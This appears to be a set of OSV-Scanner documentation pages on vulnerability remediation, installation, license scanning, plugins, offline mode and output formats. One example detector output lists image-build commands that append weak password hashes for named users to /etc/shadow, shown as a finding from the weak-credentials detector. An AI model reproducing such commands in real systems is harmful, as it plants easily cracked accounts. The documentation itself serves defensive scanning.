of the initial interactive results screen, showing found vulnerabilities and the potential remediation approaches](images/guided-remediation-result.png) {: .highlight } > The initial screen allows you to change the vulnerability selection criteria. Each corresponds to a [vulnerability selection flag](#vulnerability-selection): > > - Max dependency depth: `--max-depth` > - Min CVSS score: `--min-severity` > - Exclude dev only: `--ignore-dev` From the first results screen, you can select which of the two remediation strategies to attempt. 
## Remediation strategies There are currently three remediation strategies: ### In-place lockfile changes 'In-place' remediation involves replacing vulnerable versions of packages in your lockfile with non-vulnerable versions, while still respecting the existing constraints for that dependency. This approach is usually less risky, but will often fix fewer vulnerabilities than the [relax strategy](#relock-and-relax-direct-dependencies). Selecting the "Modify lockfile in place" option will bring you to the in-place information page. From here, you can see which vulnerabilities can and cannot be resolved by this strategy. By default, every possible in-place patch will be chosen to be applied. You may instead choose which subset of patches you wish to apply. ![Screenshot of the interactive in-place results screen](images/guided-remediation-in-place-results.png) ![Screenshot of the interactive in-place patch selection screen](images/guided-remediation-in-place-choose.png) If you wish to apply the proposed in-place patches, select the "Write" option to update your lockfile with the new dependency versions. {: .note } Writing these changes will not reinstall your dependencies. You'll need to run `npm ci` (or equivalent) separately. ### Relock and relax direct dependencies Relocking recomputes your entire dependency graph based on your manifest file, taking the newest possible versions of all your required packages. Doing so will often allow for constraints on vulnerable packages to be unblocked and thus able to be remediated. However, relocking may cause a large number of changes to your dependency graph, which potentially carries a larger risk of breakages. Selecting the "Relock" option will bring you to the relock information page. Here, you can see which vulnerabilities are present after relocking. In addition to relocking, it may be possible to further remove vulnerabilities by bumping the required version constraints of your direct dependencies. 
You may choose to apply these patches by selecting them on the relock page then choosing the "Apply pending patches" option. The dependency graph will then be recomputed, and you may continue to select more options. ![Screenshot of the interactive relock results screen with some relaxation patches selected](images/guided-remediation-relock-patches.png) The relaxation patches are presented in order of effectiveness, with patches that resolve the most vulnerabilities with the least amount of dependency change shown first. If you wish to apply your current relock & relaxation changes, select the "Write" option to update your manifest file with the new requirements and regenerate your lockfile (if provided). {: .note } The `package-lock.json` file is regenerated by first deleting the existing `package-lock.json` and `node_modules/` directory, then running `npm install --package-lock-only`. This recreates the lockfile but does not install the `node_modules/` dependencies. Run `npm ci` separately to install the dependencies. ### Override dependency versions {: .note } The `override` strategy is currently only supported in non-interactive mode. Maven allows for the version specification of direct and indirect dependencies to be overwritten by a POM's `<dependencyManagement>`. This mechanism can be used to force a vulnerable dependency to be updated to a newer, non-vulnerable version. Overriding dependency versions can enable otherwise inaccessible updates, but it also risks breaking the application if the new version is incompatible with other dependencies. If a direct dependency is vulnerable, the override strategy will update its version in the `<dependencies>` section (if possible). Relevant `<properties>` will be updated if used by an existing version specification. As with the other strategies, override patches are prioritized by vulnerabilities fixed per updated dependency. 
## Remediation flags The `fix` subcommand has a number of flags to allow you to control which vulnerabilities and patches may be considered during remediation. Guided remediation can be run in the [interactive mode](#interactive-mode) with `--interactive` flag. ### Non-interactive flags The following flags may be used when running in non-interactive mode only: - `--strategy=` [`in-place`](#in-place-lockfile-changes) OR [`relax`](#relock-and-relax-direct-dependencies) OR [`override`](#override-dependency-versions): Which remediation strategy to use. - `--apply-top=`: Specifies the maximum number of patches to apply. Patches are chosen in the same order as they would appear in the interactive mode. For example, `--apply-top=1` will only apply one patch, and `--apply-top=2` would apply the two best compatible patches. This flag is particularly useful when scripting to test the outcome of specific patches. Setting `--apply-top=-1` will apply every possible patch (default behavior). - `--no-introduce`: Set to exclude patches that would introduce new vulnerabilities if applied. - `--format=` `text` OR `json`. The [output format](#output-formats) to use for results. ### Vulnerability selection The following flags may be used to filter which vulnerabilities will be selected for remediation: - `--max-depth=`: The maximum dependency depth to consider vulnerabilities from. For example, `--max-depth=1` will only consider vulnerabilities affecting direct dependencies, while `--max-depth=2` will consider up to the direct dependencies of your direct dependencies. Setting `--max-depth=-1` will consider all dependencies, regardless of depth. - `--min-severity=`: The minimum CVSS score of vulnerabilities to consider. For example, `--min-severity=7.5` will consider only vulnerabilities with a CVSS score of 7.5 and above. If the OSV record for the vulnerability does not have a CVSS score, it will **not** be excluded. 
- `--ignore-dev`: Whether to exclude vulnerabilities from dependencies that are only used in `devDependencies`. - `--ignore-vulns=`: A list of OSV IDs to exclude from consideration. - `--vulns=`: An explicit list of OSV IDs that should exclusively be considered, as long as the other criteria are satisfied. A vulnerability is only considered if it satisfies all the conditions set by these flags. ### Dependency upgrade options The following flag may be used to limit the patches allowed for your dependencies: - `--upgrade-config=<[package-name:]level>` Sets the maximum upgrade level allowed for a package. Can be repeated for multiple packages. `level` is the SemVer component to allow updates to, can be one of `major`, `minor`, `patch`, or `none`. e.g. If a package was at version `1.2.3` - `major` allows for updates to any version `>=1.2.3` - `minor` allows for updates `>=1.2.3, <2.0.0` - `patch` allows for updates `>=1.2.3, <1.3.0` - `none` disallows any updates If `package-name:` is omitted, `level` is applied to all packages. The specific `package-name:level` will take precedence over the general `level` (e.g. specifying both `minor` `pkg:none` will use `none` as the allowed level for `pkg`). Default behaviour is `--upgrade-config=major`. Example usage: - `--upgrade-config=minor` - disallow any patches that would bump a major version of any package. - `--upgrade-config=foo:minor` - disallow any patches that bumps package `foo` by a major version. Other packages may receive major version-updating patches. - `--upgrade-config=none --upgrade-config=foo:patch` - only allow patches to package `foo`, and only allow changes to `foo`'s SemVer patch level. ### Data source By default, we use the [deps.dev API](https://docs.deps.dev/api/) to find version and dependency information of packages during remediation. If instead you'd like to use your ecosystem's native registry API (e.g. `https://registry.npmjs.org`), you can use the `--data-source=native` flag. 
`osv-scanner fix` will attempt to use the authentication specified by the native tooling (e.g. `npm config` or Maven's `settings.xml`). {: .highlight } If your project uses mirrored or private registries, you will need to use `--data-source=native` {: .note } > The subcommand caches the requests it makes in `[FILE].resolve.deps` (deps.dev), `package.json.resolve.npm` (native npm), or `pom.xml.resolve.maven` (native Maven). > > The native caches will store the addresses of private registries used, though not any authentication information. ### Maven flags - `--maven-fix-management`: If set, patches for vulnerabilities in packages declared in `<dependencyManagement>` will be made, even if those packages are not found in the resolved dependency tree (useful for patching parent POM files). - `--maven-registry=`: Override for the default registry used to fetch dependencies (typically the `central` repository at `https://repo.maven.apache.org/maven2`) ### Offline Vulnerability Database The `fix` subcommand supports the `--offline-vulnerabilities` and `--download-offline-databases` flags. For more information, see [Offline Mode](./offline-mode.md). ## Known issues - The subcommand does not use the `osv-scanner.toml` configuration. Use the `--ignore-vulns` flag instead. - The subcommand does not group aliases of the same vulnerabilities together. - Unique vulnerabilities are counted differently with `fix --strategy=relax` versus with `fix --strategy=in-place` and with `scan`. `scan` will count the same OSV ID affecting two different package versions separately, whereas `fix --strategy=relax` will count this as one vulnerability. e.g. if `OSV-123-456` affects both `foo@1.0.0` and `foo@2.0.0` in your project, `scan` and `fix --strategy=in-place` will treat this as two distinct vulnerabilities, while `fix --strategy=relax` will treat this as only one. ### npm - Non-registry dependencies (local paths, URLs, Git, etc.) are not evaluated. 
- [#1026](https://github.com/google/osv-scanner/issues/1026) `peerDependencies` are not properly considered during dependency resolution (treated as if using `--legacy-peer-deps`). - `overrides` are ignored during dependency resolution. #### Workspaces Remediation in npm `workspaces` is only partially supported: - In-place updates should function correctly on the workspace `package-lock.json`. - Dependency relaxation can change dependencies in the `package.json` file being scanned. This means only dependencies declared in the root package can be changed. - You can remediate the individual `package.json` files of each workspace, but this will be unaware of any packages or constraints caused by sibling workspaces. - The `node_modules/` in workspaces are not deleted when relocking, which may impact the resulting dependency graph when running `npm install`. - Each workspace package is considered dependency depth 1 from the root workspace. ### Maven - [#1238](https://github.com/google/osv-scanner/issues/1238) Dependencies that use properties in their `groupId`/`artifactId` may not be updated correctly. - [#1239](https://github.com/google/osv-scanner/issues/1239) Support for profiles is limited. - Encrypted values in `settings.xml` files are not supported. ================================================ FILE: docs/index.md ================================================ --- # Feel free to add content and custom Front Matter to this file. 
# To modify the layout, see https://jekyllrb.com/docs/themes/#overriding-theme-defaults layout: home nav_order: 1 --- # OSV-Scanner [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/google/osv-scanner/badge)](https://api.securityscorecards.dev/projects/github.com/google/osv-scanner) [![Go Report Card](https://goreportcard.com/badge/github.com/google/osv-scanner)](https://goreportcard.com/report/github.com/google/osv-scanner) [![SLSA 3](https://slsa.dev/images/gh-badge-level3.svg)](https://slsa.dev) [![GitHub Release](https://img.shields.io/github/v/release/google/osv-scanner)](https://github.com/google/osv-scanner/releases) Use OSV-Scanner to find existing vulnerabilities affecting your project's dependencies. OSV-Scanner provides an officially supported frontend to the [OSV database](https://osv.dev/) that connects a project’s list of dependencies with the vulnerabilities that affect them. You can use OSV-scanner in two ways: 1. **As a CLI tool:** Run directly in a terminal or CI/CD pipeline to scan projects. See the [Installation Guide](./installation.md) to get started. 2. **As a Go library:** Import the [Go package](https://pkg.go.dev/github.com/google/osv-scanner/v2/pkg/osvscanner) to integrate vulnerability scanning logic into Go applications. Since the OSV.dev database is open source and distributed, it has several benefits in comparison with closed source advisory databases and scanners: - Each advisory comes from an open and authoritative source (e.g. the [RustSec Advisory Database](https://github.com/rustsec/advisory-db)) - Anyone can suggest improvements to advisories, resulting in a very high quality database - The OSV format unambiguously stores information about affected versions in a machine-readable format that precisely maps onto a developer’s list of packages The above all results in fewer, more actionable vulnerability notifications, which reduces the time needed to resolve them. 
Check out our [announcement blog post] for more details! [announcement blog post]: https://security.googleblog.com/2022/12/announcing-osv-scanner-vulnerability.html ================================================ FILE: docs/installation.md ================================================ --- layout: page permalink: /installation/ nav_order: 3 --- # Installation You may download the [SLSA3](https://slsa.dev) compliant binaries for Linux, macOS, and Windows from our [releases page](https://github.com/google/osv-scanner/releases). ## Package Managers [![Packaging status](https://repology.org/badge/vertical-allrepos/osv-scanner.svg)](https://repology.org/project/osv-scanner/versions) ### Windows Scoop [Windows Scoop](https://scoop.sh) users can install osv-scanner from the [official bucket](https://github.com/ScoopInstaller/Main/blob/master/bucket/osv-scanner.json): ```bash scoop install osv-scanner ``` ### Windows WinGet Windows users can also install osv-scanner from the official [WinGet repo](https://github.com/microsoft/winget-pkgs): ```bash winget install Google.OSVScanner ``` ### Homebrew [Homebrew](https://brew.sh/) users can install [osv-scanner](https://formulae.brew.sh/formula/osv-scanner) via: ```bash brew install osv-scanner ``` ### Arch Linux Arch Linux users can install osv-scanner from the official repo: ```bash pacman -S osv-scanner ``` ### Alpine Linux Alpine Linux users can install osv-scanner from the official repo: ```bash apk add osv-scanner ``` ### FreeBSD FreeBSD users can install osv-scanner from the official repo: ```bash pkg install osv-scanner ``` ### NetBSD NetBSD users can install osv-scanner from the official repo: ```bash pkg_add osv-scanner ``` ### OpenBSD OpenBSD users can install osv-scanner from the official repo: ```bash pkg_add osv-scanner ``` ## Install from source Alternatively, you can install this from source by running: ```bash go install github.com/google/osv-scanner/v2/cmd/osv-scanner@latest ``` This requires Go 1.25.7+ to 
be installed. ## Build from source See our [contribution guidelines](https://github.com/google/osv-scanner/blob/main/CONTRIBUTING.md) for instructions on how to build from source. ## Verifying Builds Each of our releases comes with SLSA provenance data (`multiple.intoto.jsonl`), which can be used to verify the source and provenance of the binaries with the [`slsa-verifier`](https://github.com/slsa-framework/slsa-verifier) tool. E.g. ```bash slsa-verifier verify-artifact ./osv-scanner_1.2.0_linux_amd64 --provenance-path multiple.intoto.jsonl --source-uri github.com/google/osv-scanner --source-tag v1.2.0 ``` Replace the artifact name and the `--source-tag` value with those of the release you downloaded. ## SemVer Adherence All releases on the same Major version will be guaranteed to have backward compatible JSON output and CLI arguments. However, features prefixed with `experimental` (e.g. `--experimental-call-analysis`) might be changed or removed with only a Minor version change. ================================================ FILE: docs/license-scanning.md ================================================ --- layout: page permalink: /usage/license-scanning/ parent: Usage nav_order: 3 --- # License Scanning {: .no_toc }
Table of contents {: .text-delta } - TOC {:toc}
OSV-Scanner supports license checking as an official feature. The data comes from the [deps.dev API](https://docs.deps.dev/api/). ## License Summary and Violations The `--licenses` flag provides a summary of the licenses used by your dependencies. To also display violations, you can provide an allowlist of permitted licenses as an argument: ```bash # Show license summary only osv-scanner --licenses path/to/repository # Show the license summary and violations against an allowlist (provide the list after the = sign): osv-scanner --licenses="comma-separated list of allowed licenses" path/to/directory ``` Include your allowed licenses as a comma-separated list. OSV-Scanner recognizes licenses in SPDX format. Please indicate your allowed licenses using [SPDX license](https://spdx.org/licenses/) identifiers. ### License violations example If you wanted to allow the following licenses: - [BSD 3-Clause "New" or "Revised" License](https://spdx.org/licenses/BSD-3-Clause.html) - [Apache License 2.0](https://spdx.org/licenses/Apache-2.0.html) - [MIT](https://spdx.org/licenses/MIT.html) Your command would be in this form: ```bash osv-scanner --licenses="BSD-3-Clause,Apache-2.0,MIT" path/to/directory ``` ## Override License Sometimes, the license either cannot be retrieved, or does not apply to your specific use. In those cases, you can override the license of a specific package by setting it in the config file. See the [configuration docs](./configuration.md) for how to do this. ================================================ FILE: docs/manual-plugin-selection.md ================================================ --- layout: page permalink: /experimental/manual-plugin-selection/ parent: Experimental Features nav_order: 5 --- # Manual OSV-Scalibr Plugin Selection Experimental {: .label } {: .no_toc }
Table of contents {: .text-delta } - TOC {:toc}
By default, OSV-Scanner automatically enables the relevant plugins for each scanning situation (see [this page](./supported_languages_and_lockfiles.md) for more details). However, if the default selection is not suitable, or you require additional plugins from OSV-Scalibr (e.g., detectors), you can manually enable or disable them. ## Enabling and Disabling Plugins You can control which plugins to run using the following flags: - `--experimental-plugins`: Enables a comma-separated list of specific plugins that will be used along with the default plugins for the command being run - `--experimental-disable-plugins`: Disables a comma-separated list of specific plugins. - `--experimental-no-default-plugins`: Excludes the default plugins for the command being run from being automatically included For a full list of available plugin names, see OSV-Scalibr's documentation here: https://github.com/google/osv-scalibr/blob/main/docs/supported_inventory_types.md ### Presets You can also enable or disable various presets, which group multiple plugins together. **Example:** ```bash # This will enable all sbom plugins + cargolock extractor + requirements extractor osv-scanner scan source --experimental-plugins sbom,rust/cargolock,python/requirements # This will enable all lockfile plugins, except the cargolock and requirements extractors osv-scanner scan source --experimental-plugins lockfile --experimental-disable-plugins rust/cargolock,python/requirements ``` **Available Presets:** | Preset | Description | | :---------- | :------------------------------ | | `sbom` | Default for directory scanning. | | `lockfile` | Default for lockfile scanning. | | `directory` | Default for directory scanning. | | `artifact` | Default for image scanning. | ### Detectors OSV-Scalibr provides detectors that can identify potential security issues beyond known vulnerabilities. We experimentally support these detectors. 
Currently, detector findings are only available in the JSON output (`--format=json`), under the `experimental_generic_findings` key; the other output formats do not show them. **Available Detector Presets:** | Preset | Description | | :------------ | :----------------------------------------- | | `untested` | Finds dependencies that are not tested. | | `weakcreds` | Detects weak credentials. | | `govulncheck` | Checks for vulnerabilities in Go binaries. | | `cis` | Checks for compliance with CIS benchmarks. |
Example detector run ```bash osv-scanner scan image --experimental-plugins=os/apk,weakcredentials/etcshadow --format=json ``` ```json { "results": [ { "source": { "path": "/lib/apk/db/installed", "type": "os" }, "packages": [ { "package": { "name": "apk-tools", "os_package_name": "apk-tools", "version": "2.10.6-r0", "ecosystem": "Alpine:v3.10", "commit": "ee458ccae264321745e9622c759baf110130eb2f", "image_origin_details": { "index": 0 } }, "vulnerabilities": ["CVE-2021-36159"], "groups": 1 } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } }, "experimental_generic_findings": [ { "Adv": { "ID": { "Publisher": "SCALIBR", "Reference": "etc-shadow-weakcredentials" }, "Title": "Ensure all users have strong passwords configured", "Description": "The /etc/shadow file contains user account password hashes. These passwords must be strong and not easily guessable.", "Recommendation": "Run the following command to reset password for the reported users:/n# change password for USER: sudo passwd USER", "Sev": 5 }, "Target": { "Extra": "/etc/shadow: The following users have weak passwords:/nuser-bcrypt/n" }, "Plugins": ["weakcredentials/etcshadow"], "ExploitabilitySignals": null } ], "image_metadata": { "os": "Alpine Linux v3.10", "layer_metadata": [ { "diff_id": "sha256:...", "command": "/bin/sh -c #(nop) ADD file:c5377eaa926bf412dd8d4a08b0a1f2399cfd708743533b0aa03b53d14cb4bb4e in / ", "is_empty": false, "base_image_index": 1 }, { "diff_id": "", "command": "/bin/sh -c #(nop) CMD [\"/bin/sh\"]", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c echo 'user-bcrypt:$2b$05$IYDlXvHmeORyyiUwu8KKuek2LE8VrxIYZ2skPvRDDNngpXJHRq7sG' /u003e/u003e /etc/shadow # buildkit", "is_empty": false, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c echo 'user-descrypt:chERDiI95PGCQ' /u003e/u003e /etc/shadow # buildkit", "is_empty": false, "base_image_index": 0 } ], "base_images": [ {}, { 
"name": "alpine", "tags": null } ] } } ```
================================================ FILE: docs/migrating-from-scalibr.md ================================================ --- layout: default title: Migrating from osv-scalibr nav_order: 18 --- # Migrating from osv-scalibr to osv-scanner This guide is for users who are familiar with `osv-scalibr` and want to migrate to `osv-scanner`. It explains how to achieve similar results with `osv-scanner`. `osv-scanner` has integrated `osv-scalibr`'s inventory collection and vulnerability scanning capabilities. While most of `osv-scalibr`'s functionalities are available in `osv-scanner`, the command-line flags and output formats are different. ## Command-line Equivalence The `osv-scanner` CLI is designed to be more intuitive and user-friendly. Here's a mapping of common `osv-scalibr` commands to their `osv-scanner` equivalents. ### Scanning a directory **osv-scalibr:** ```sh scalibr --root /path/to/your/project --result result.json ``` **osv-scanner:** ```sh osv-scanner /path/to/your/project ``` ### Selecting plugins OSV-Scanner has access to the full list of OSV-Scalibr plugins, though only a well tested subset of them are enabled by default in OSV-Scanner. In `osv-scalibr`, you can select which plugins to run using the `--extractors`, `--detectors` flags, or alternatively using the `--plugins` flag. For a full list of available plugin names, see OSV-Scalibr's documentation here: https://github.com/google/osv-scalibr/blob/main/docs/supported_inventory_types.md **osv-scalibr:** ```sh scalibr --plugins python/pip,go/gomod --detectors go/govulncheck /path/to/your/project ``` In `osv-scanner`, you can achieve the same by using the `--experimental-plugins` flag. This is an experimental feature. **osv-scanner:** ```sh osv-scanner --experimental-plugins python/pip,go/gomod,go/govulncheck /path/to/your/project ``` `osv-scanner` lets you exclude its default plugins with `--experimental-no-default-plugins`, for when you want to only run specific plugins. 
`osv-scanner` also allows you to disable specific plugins with `--experimental-disable-plugins`. For more details on manual plugin selection in `osv-scanner`, see the [manual plugin selection documentation](manual-plugin-selection.md). ### Generating SPDX output `osv-scalibr` uses the `-o` flag to specify the output format and file. For example, to generate an SPDX JSON report: **osv-scalibr:** ```sh scalibr -o spdx23-json=result.spdx.json /path/to/your/project ``` `osv-scanner` uses the `--format` flag to specify the output format. The output is written to standard output by default; use the separate `--output-file` flag if you wish to save it to a file. **osv-scanner:** ```sh osv-scanner --format spdx-2-3 /path/to/your/project > result.spdx.json ``` For more details on `osv-scanner` output formats, see the [output documentation](output.md). ## Flag Translation Table | `osv-scalibr` Flag | `osv-scanner` Flag | Notes | | --------------------------------- | ------------------------- | ---------------------------------------------------------------------------------------------------------- | | `--version` | `--version` | `osv-scanner version` | | `--root` | `[directory]` (argument) | `osv-scanner scan source [directory]` | | `--result` | `--output` | `osv-scanner --output ` | | `-o` | `--format` and `--output` | e.g. `osv-scalibr -o spdx23-json=r.json` becomes `osv-scanner --format spdx-2-3 --output-file r.json` | | `--plugins` | `--experimental-plugins` | | | `--extractors` | `--experimental-plugins` | | | `--detectors` | `--experimental-plugins` | | | `--annotators` | `--experimental-plugins` | | | `--ignore-sub-dirs` | (no direct equivalent) | `osv-scanner` is not recursive by default. Use `--recursive` to enable. 
| | `--skip-dirs` | Not yet available | | | `--skip-dir-regex` | Not yet available | | | `--skip-dir-glob` | Not yet available | | | `--max-file-size` | Not yet available | | | `--use-gitignore` | (default behavior) | Use `--no-ignore` to disable. | | `--remote-image` | `[image]` (argument) | `osv-scanner scan image [image]` | | `--image-tarball` | `--archive` | `osv-scanner scan image --archive [tarball]` | | `--image-local-docker` | `[image]` (argument) | `osv-scanner scan image [image]` (it will look for local images first) | | `--image-platform` | Not yet available | | | `--gobinary-version-from-content` | Not yet available | | | `--govulncheck-db` | Not yet available | | | `--spdx-document-name` | Not yet available | | | `--spdx-document-namespace` | Not yet available | | | `--spdx-creators` | Not yet available | | | `--cdx-component-name` | Not yet available | | | `--cdx-component-type` | Not yet available | | | `--cdx-component-version` | Not yet available | | | `--cdx-authors` | Not yet available | | | `--verbose` | `--verbosity` | `osv-scanner --verbosity `, e.g. `debug`. | | `--explicit-extractors` | (default behavior) | | | `--filter-by-capabilities` | (default behavior) | `osv-scanner` automatically filters plugins. | | `--windows-all-drives` | Not yet available | | | `--offline` | `--offline` | | | `--local-registry` | `--maven-registry` | Only for Maven. 
| ================================================ FILE: docs/migration-guide.md ================================================ # Migration Guide ## `v1` to `v2` migration guide ### CLI changes: Most experimental commands have now been stabilized, and all experimental versions of these flags have been removed: - `--experimental-call-analysis` => `--call-analysis` - `--experimental-no-call-analysis` => `--no-call-analysis` - `--experimental-all-packages` => `--all-packages` - `--experimental-licenses` & `--experimental-license-summary` => `--licenses` - Instead of two separate flags, by having no values after `--licenses`, it behaves the same way as just `--experimental-license-summary` - You can still specify the license allow list after `--licenses` flag like so: `--licenses="MIT,Apache 2.0,..."` - `--experimental-offline` => `--offline` - `--experimental-offline-vulnerabilities` => `--offline-vulnerabilities` - `--experimental-download-offline-databases` => `--download-offline-databases` - `--experimental-no-resolve` => `--no-resolve` --- Container scanning and the `--docker/-D` flag have been migrated to their own command. ```bash osv-scanner scan image ``` --- [Guided remediation](https://google.github.io/osv-scanner/experimental/guided-remediation/) now defaults to the non-interactive mode. To run in the interactive mode, use the `--interactive` flag. --- `--verbosity=verbose` verbosity level removed. Now there are only `info`, `warn`, `error` verbosity levels. --- `osv-scanner ` is now a shortcut for `osv-scanner scan source `. --- SBOM scanning (`osv-scanner --sbom`) now relies on the filename of the sbom file to follow the relevant SBOM specs. E.g. `*.spdx.json`. --- The `.git` root hash directory is not automatically scanned now, therefore: `--skip-git` flag removed, replaced with `--include-git-root`. 
--- The following deprecated flags have been removed: - `scan --json` removed, please use `--format=json` - `fix --disallow-major-upgrades` removed - `fix --disallow-package-upgrades` removed ### JSON output changes: License summary is now in JSON output when `--license-summary` is used, rather than showing every package. ================================================ FILE: docs/offline-mode.md ================================================ --- layout: page permalink: /usage/offline-mode/ parent: Usage nav_order: 4 --- # Offline Mode {: .no_toc }
Table of contents {: .text-delta } - TOC {:toc}
OSV-Scanner now supports offline scanning as an official feature. Offline scanning checks your project against a local database instead of calling the OSV.dev API. ## Specify database location Our offline features require the use of a local database, the location of which is determined through the use of the `OSV_SCANNER_LOCAL_DB_CACHE_DIRECTORY` environment variable. The local database file structure is in this form: ``` {local_db_dir}/ osv-scanner/ npm/all.zip PyPI/all.zip … {ecosystem}/all.zip ``` Where `{local_db_dir}` can be set by the `OSV_SCANNER_LOCAL_DB_CACHE_DIRECTORY` environment variable. If the `OSV_SCANNER_LOCAL_DB_CACHE_DIRECTORY` environment variable is _not_ set, OSV-Scanner will attempt to look for the database in the following locations, in this order: 1. The location returned by [`os.UserCacheDir`](https://pkg.go.dev/os#UserCacheDir) 2. The location returned by [`os.TempDir`](https://pkg.go.dev/os#TempDir) Offline scan results are only as trustworthy as the local database files, so on shared machines consider setting `OSV_SCANNER_LOCAL_DB_CACHE_DIRECTORY` explicitly to a directory that only the scanning user can write to, rather than relying on these fallback locations. The database can be [downloaded manually](#manual-database-download) or by using the [`--download-offline-databases` flag](#download-offline-databases-option). ## Offline option The offline database flag `--offline` causes OSV-Scanner to scan your project against a previously downloaded local database. OSV-Scanner will not download or update the local database, nor will it send any project or dependency information anywhere. When a local database is not present, you will get an error message. No network connection is required when using this flag. ```bash osv-scanner --offline ./path/to/your/dir ``` To use offline mode for just the vulnerability database, but allow other features to possibly make network requests (e.g. [transitive dependency scanning](./supported_languages_and_lockfiles.md#transitive-dependency-scanning)), you can use the `--offline-vulnerabilities` flag instead. 
## Download offline databases option The download offline databases flag `--download-offline-databases` allows OSV-Scanner to download or update your local database when running in offline mode, to make it easier to get started. This option only works when you also set the offline flag. ```bash osv-scanner --offline-vulnerabilities --download-offline-databases ./path/to/your/dir ``` ## Manual database download Instead of using the `--download-offline-databases` flag to download the database, it is possible to manually download the database. A downloadable copy of the OSV database is stored in a GCS bucket maintained by OSV: [`gs://osv-vulnerabilities`](https://osv-vulnerabilities.storage.googleapis.com) This bucket contains zip files containing all vulnerabilities for each ecosystem at: `gs://osv-vulnerabilities/{ecosystem}/all.zip`. E.g. for PyPI vulnerabilities: ```bash gcloud storage cp gs://osv-vulnerabilities/PyPI/all.zip . ``` You can also download over HTTP via `https://osv-vulnerabilities.storage.googleapis.com/{ecosystem}/all.zip`. A list of all current ecosystems is available at [`gs://osv-vulnerabilities/ecosystems.txt`](https://osv-vulnerabilities.storage.googleapis.com/ecosystems.txt). Set the location of your manually downloaded database by following the instructions [here](#specify-database-location). ## Limitations 1. Commit level scanning is not supported. ================================================ FILE: docs/osv-reporter.md ================================================ --- layout: page permalink: /experimental/osv-reporter/ parent: Experimental Features nav_order: 4 --- # OSV-Reporter Experimental {: .label } OSV-Reporter can be used to perform some experimental operations on the OSV-Scanner output JSON. ## Features - Create a diff between two osv-scanner.json outputs, so you can see only new vulnerabilities. 
```bash $ osv-reporter --old previous-osv-scanner.json --new current-osv-scanner.json ``` - Output multiple different formats from a single set of scan results. ```bash $ osv-reporter --new osv-scanner.json --output-files=[format]:[output-path],[format2]:[output-path2] ``` ## How to install We don't provide prebuilt binaries for osv-reporter as it is very experimental and can change at any point. Currently you can install it from source via `go install`: ```bash $ go install github.com/google/osv-scanner/v2/cmd/osv-reporter@latest # Or @main for the latest commit ``` ================================================ FILE: docs/output.md ================================================ --- layout: page permalink: /output/ nav_order: 6 --- # Output {: .no_toc }
Table of contents {: .text-delta } - TOC {:toc}
## Explanation of output data For every vulnerability found, OSV-Scanner will display the following information: - OSV URL: Link to the osv.dev entry for the vulnerability - CVSS: CVSS v2 or v3, calculated from the [severity[].score](https://ossf.github.io/osv-schema/#severity-field) field. - Ecosystem: Ecosystem associated with the package - Package: Package name - Version: Package version - Fixed Version: The version where the vulnerability is fixed, if available. If no fix is available, this will be shown as `--`. - Source: Path to the sbom or lockfile where the package originated And if you are performing layer scanning, osv-scanner additionally returns: - Layer where a package was first introduced - Layer history and commands - Base images the image is based on - OS/Distro the container is running on ## Output formats You can control the format used by the scanner to output results with the `--format` flag. ### Table (Default) The default format, which outputs the results as a human-readable table. ```bash osv-scanner scan --format table your/project/dir ```
Sample table output ```bash Total 2 packages affected by 2 known vulnerabilities (1 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 2 ecosystems. 1 vulnerability can be fixed. ╭─────────────────────────────────────┬──────┬───────────┬──────────────────────────┬───────────────┬─────────┬────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ FIXED VERSION │ VERSION │ SOURCE │ ├─────────────────────────────────────┼──────┼───────────┼──────────────────────────┼───────────────┼─────────┼────────────────────┤ │ https://osv.dev/GHSA-c3h9-896r-86jm │ 8.6 │ Go │ github.com/gogo/protobuf │ 1.3.2 │ 1.3.1 │ path/to/go.mod │ │ https://osv.dev/GHSA-m5pq-gvj9-9vr8 │ 7.5 │ crates.io │ regex │ -- │ 1.3.1 │ path/to/Cargo.lock │ ╰─────────────────────────────────────┴──────┴───────────┴──────────────────────────┴───────────────┴─────────┴────────────────────╯ ``` If the 'Fixed Version' column is empty or shows `--`, it means there is currently no fix for this vulnerability.
--- ### Markdown Table ```bash osv-scanner scan --format markdown your/project/dir ```
Sample markdown output **Raw output:** ``` Total 2 packages affected by 2 known vulnerabilities (1 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 2 ecosystems. 1 vulnerability can be fixed. | OSV URL | CVSS | Ecosystem | Package | Fixed Version | Version | Source | | ---------------------------------- | ---- | --------- | ------------------------ | ------------- | ------- | ------------------------------------------------------ | | https://osv.dev/GHSA-c3h9-896r-86jm| 8.6 | Go | github.com/gogo/protobuf | 1.3.2 | 1.3.1 | ../scorecard-check-osv-e2e/go.mod | | https://osv.dev/GHSA-m5pq-gvj9-9vr8| 7.5 | crates.io | regex | -- | 1.5.1 | ../scorecard-check-osv-e2e/sub-rust-project/Cargo.lock | ``` **Rendered:** | OSV URL | CVSS | Ecosystem | Package | Fixed Version | Version | Source | | ----------------------------------- | ---- | --------- | ------------------------ | ------------- | ------- | ------------------------------------------------------ | | https://osv.dev/GHSA-c3h9-896r-86jm | 8.6 | Go | github.com/gogo/protobuf | 1.3.2 | 1.3.1 | ../scorecard-check-osv-e2e/go.mod | | https://osv.dev/GHSA-m5pq-gvj9-9vr8 | 7.5 | crates.io | regex | -- | 1.5.1 | ../scorecard-check-osv-e2e/sub-rust-project/Cargo.lock |
--- ### Vertical ```bash osv-scanner scan --format vertical your/project/dir ```
Sample vertical output ```bash Total 2 packages affected by 2 known vulnerabilities (1 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 2 ecosystems. 1 vulnerability can be fixed. Go path/to/go.mod: found 1 package with issues github.com/gogo/protobuf@1.3.1 has the following known vulnerabilities: GHSA-c3h9-896r-86jm: Improper Input Validation in GoGo Protobuf Severity: '8.6'; Minimal Fix Version: '1.3.2'; 1 known vulnerability found in path/to/go.mod crates.io path/to/Cargo.lock: found 1 package with issues regex@1.5.1 has the following known vulnerabilities: GHSA-m5pq-gvj9-9vr8: Rust's regex crate vulnerable to regular expression denial of service Severity: '7.5'; Minimal Fix Version: '1.5.5'; 1 known vulnerability found in path/to/Cargo.lock ```
